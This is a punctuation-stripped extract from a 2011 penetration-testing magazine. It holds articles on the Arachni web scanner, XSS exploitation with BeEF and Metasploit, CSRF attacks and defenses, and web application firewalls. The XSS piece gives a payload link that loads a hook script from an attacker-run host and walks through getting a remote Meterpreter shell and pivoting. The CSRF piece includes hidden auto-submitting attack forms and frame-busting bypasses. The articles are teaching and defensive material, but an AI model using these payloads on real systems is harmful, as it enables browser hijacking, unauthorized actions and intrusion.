bull Plugins plug-ins help to automate tasks Plug-ins are more powerful than modules and enable to script login sequences detect Web Application Firewalls (WAF) perform dictionary attacks hellip
bull Settings the settings screens allows to add cookies and headers limit the scan to certain directories hellip
bull Reports gives access to the scan reports Arachni creates reports in its own internal format and exports them to HTML XML or text
bull Add-ons three add-ons are installedbull Auto-deploy converts any SSH enabled Linux
box in an Arachni dispatcherbull Tutorial serves as an examplebull Scheduler schedules and run scan jobs at a
specific timebull Log overview of actions taken by the GUI
Your First ScanWe will use both the command-line and the GUI First the command-line start a scan with all modules active This is extremely easy
$ arachni httpwwwexamplecom --report =afroutfile=
wwwexamplecomafr
Afterwards the HTML report can be created by executing the following
$ arachni --repload=wwwexamplecomafr --report=html
outfile=wwwexamplecomhtml
Thatrsquos it Enabling or disabling modules is of course possible Execute the following command for more information about the possibilities of the command-line interface
$ arachni --help
Usually it is not necessary to include all recon modules Some modules will create a lot of requests making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish List all modules with the following command
$ arachni --lsmod
Enabling or disabling modules is easy use the --mods switch followed by a regular expression to include modules or exclude modules by prefixing the regular expression with a dash Example
$ arachni --mods= -xss_ httpwwwexamplecom
The above will load all modules except the module related with Cross-Site-Scripting (XSS)
Using the GUI makes this process even easier Open the GUI by browsing to httplocalhost4567 and accept the default dispatcher
Next steps are to verify the settings in the Settings Modules and Plugins screens Once you are satisfied proceed to the Start a Scan screen
If you want to run a scan against some test applications visit my blog for the list of deliberately vulnerable applications Most of these applications can be installed locally or can be attacked online (please read all related faqs and permissions before scanning a site In most jurisdictions this is illegal unless permission is explicitly granted by the owner)
After the scan just go the Reports screen and download the report in the format you wantFigure 2 Start a scan screen
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
Listing 3 Create your own module
=begin
Arachni
Copyright (c) 2010-2011 Tasos Zapotek Laskos
tasoslaskosgmailcom
This is free software you can copy and distribute
and modify
this program under the term of the GPL v20 License
(See LICENSE file for details)
=end
module Arachni
module Modules
Looks for common files on the server based on
wordlists generated from open
source repositories
More information about the SVNDigger wordlists
httpwwwmavitunasecuritycomblogsvn-digger-
better-lists-for-forced-browsing
The SVNDigger word lists were released under the GPL
v30 License
author Herman Stevens
see httpcwemitreorgdatadefinitions538html
class SvnDiggerDirs lt ArachniModuleBase
def initialize( page )
super( page )
end
def prepare
to keep track of the requests and not repeat them
__audited ||= Setnew
__directories ||=[]
return if __directoriesempty
read_file( all-dirstxt )
|file|
__directories ltlt file unless fileinclude( )
end
def run( )
path = get_path( pageurl )
return if __auditedinclude( path )
print_status( Scanning SVNDigger Dirs )
__directorieseach
|dirname|
url = path + dirname +
print_status( Checking for url )
log_remote_directory_if_exists( url )
|res|
print_ok( Found dirname at +
reseffective_url )
__audited ltlt path
def selfinfo
name =gt SVNDigger Dirs
description =gt qFinds directories
based on wordlists created from
open source repositories The
wordlist utilized by this module
will be vast and will add a consi
derable amount of
time to the overall scan time
author =gt Herman Stevens ltherman
stevensgmailcomgt
version =gt 01
references =gt
Mavituna Security =gt
httpwwwmavitunasecuritycom
blogsvn-digger-better-lists-for-
forced-browsing
OWASP Testing Guide =gt
httpswwwowasporgindexphp
Testing_for_Old_Backup_and_
Unreferenced_Files_(OWASP-CM-006)
targets =gt Generic =gt all
issue =gt
name =gt qA SVNDigger
directory was detected
description =gt q
tags =gt [ svndigger path
directory discovery ]
cwe =gt 538
severity =gt IssueSeverityINFORMATIONAL
cvssv2 =gt
remedy_guidance =gt Review these
resources manually Check if
unauthorized interfaces are exposed
or confidential information
remedy_code =gt
end
end
end
end
WEB APP VULNERABILITIES
Page 28 httppentestmagcom012011 (1) November
Create your Own ModuleArachni is very modular and can be easily extended In the following example we create a new reconnaissance module
Move into your Arachni source tree Yoursquoll find the modules directory In there yoursquoll find two directories audit and recon Move into the recon directory We will create our Ruby module
Arachni makes it real easy if your module needs external files it will search into a subdirectory with the same name Example if you create a svn_digger_dirsrb module this module is able to find external files in the modulesreconsvn_digger_dirs subdirectory
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing These wordlists are based on directories found in open source code repositories
If there is a directory that needed to be protected and you forget that it will be found by a scanner that uses these wordlists
Furthermore it can be used as a basis for reconnaissance if a directory or file is detected this might provide clues about what technology the site is using
Download the wordlists from the above URL Create a directory modulesreconsvn_digger_dirs and move the file all-dirstxt from the wordlist archive to the newly created directory
Create a copy of the file modulesreconcommon_
directoriesrb and name it svn_digger_dirsrb Change the code to read as follows Listing 3
The code does not need a lot of explanation it will check whether or not a specific directory exists if yes it will forward the name to the Arachni Trainer (who will include the directory in the further scans) as well as create a report entry for it
Note the above code as well as another module based on the SVNDigger wordlists with filenames are now part of the experimental Arachni code base
ConclusionWe used Arachni in many of our application vulnerability assessments The good points are
bull Highly scalable architecture just create more servers with dispatchers and share the load This makes the scanner a lot more responsive and fast
bull Highly extensible create your own modules plug-ins and even reports with ease
bull User-friendly start your scan in minutesbull Very good XSS and SQLi detection with very few
false positives There are false negatives but this
is usually caused by Arachni not detecting the links to be audited This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy
bull Excellent reporting capabilities with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE)
Arachni lacks support for the following
bull No AJAX and JSON supportbull No JavaScript support
This means that you need to help Arachni finding links hidden in JavaScript eg by using it as a proxy between your browser and the web application Yoursquoll need a different tool (or use your brain and manual tests) to check for AJAXJSON related vulnerabilities in the application you are testing
Arachni also cannot examine and decompile Flash components but a lot of tools are at hand to help you with that Arachni does not perform WAF (Web Application Firewall) evasion but then again this is not necessarily difficult to do manually for a skilled consultant or hacker
And why not write your own module or plug-in that implements the missing functionality Arachni is certainly a tool worth adding to your toolkit
HERMAN STEVENSAfter a career of 15 years spanning many roles (developer security product trainer information security consultant Payment Card Industry auditor application security consultant) Herman Stevens now works and lives in Singapore where he is the director of his company Astyran Pte Ltd (httpwwwastyrancom) Astyran specialises in application security such as penetration tests vulnerability assessments secure code reviews awareness training and security in the SDLC Contact Herman through email (hermanstevensgmailcom) or visit his blog (httpblogastyransg)
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
In most commercial penetration testing reports itrsquos sufficient to just show a small alert popup this is to show that a particular parameter is vulnerable to
an XSS attack However this is not how an attacker would function in the real world Sure hersquod use a pop up initially to find out which parameter is vulnerable to an XSS attack Once hersquos identified that though hersquoll look to steal information by executing malicious JavaScript or even gain total control of the userrsquos machine
In this article wersquoll look at how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using Beef (A browser exploitation framework)
A Simple POCTo start off though letrsquos do exactly what the attacker would do which is to identify a vulnerability For simplicityrsquos
sake wersquoll assume that the attacker has already identified a vulnerable parameter on a page Here are the relevant files which you too can use on your web server if you want to try this also
HTML Page
ltHTMLgt
ltBODYgt
ltFORM NAME=rdquotestrdquo action=rdquosearch1phprdquo method=rdquoGETrdquogt
Search ltINPUT TYPE=rdquotextrdquo name=rdquosearchrdquogtltINPUTgt
ltINPUT TYPE=rdquosubmitrdquo name=rdquoSubmitrdquo value=SubmitgtltINPUTgt
ltFORMgt
ltBODYgt
ltHTMLgt
XSS Beef Metaspoilt Exploitation
Figure 2 BeeF after conguration
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code
Figure 1 User enters in a search box
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
httplocalhostsearch1phpsearch=ltscript src=
rsquohttp19216856101beefhookbeefmagicjsphprsquogt
ltscriptgtampSubmit=Submit
The IP address here is the one on which you have BeeF running Once the user clicks on the link above you should see an entry in the BeeF controller window showing that a Zombie has connected You can see this in the Log section on the right hand side or the Zombie section on the left hand side Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3)
Click and highlight the zombie in the left pane and then click on Standard Modules ndash Alert Dialog This will result in a little popup box popping up on the victim machine Herersquos a screenshot which shows the same (Figure 4) And this is what the victim will see (Figure 5)
So as you can see because of Beef even an unskilled attacker can run code which he does not even understand on the victimrsquos machine and steal sensitive data Hence it becomes all the more
Server Side PHP Code
ltphp
$a=$_GET[lsquosearchrsquo]
echo bdquoThe parameter passed is $ardquo
gt
As you can see itrsquos some very simple code where the user enters something in a search box on the first page his input is sent to the server which reads the value of the parameter and prints it on to the screen So instead of a simple text input the attack enters a simple JavaScript into the box the JavaScript will execute on the userrsquos machine and not get displayed The user hence has to just been tricked into clicking on a link httplocalhostsearch1phpsearch=ltscriptgtalert(documentdomain)ltscriptgt
The screenshot below clarifies the above steps (Figure 1)
Beef ndash Hook the userrsquos browserNow while this example is sufficient to prove that the site is vulnerable to XSS itrsquos most certainly not what an attacker will stop at An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the userrsquos browser and machine
I used an older version of Beef(032) as I just wanted to demonstrate what you can do with such a tool The newer version has been rewritten completely and has many more features For now though extract Beef from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacer will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
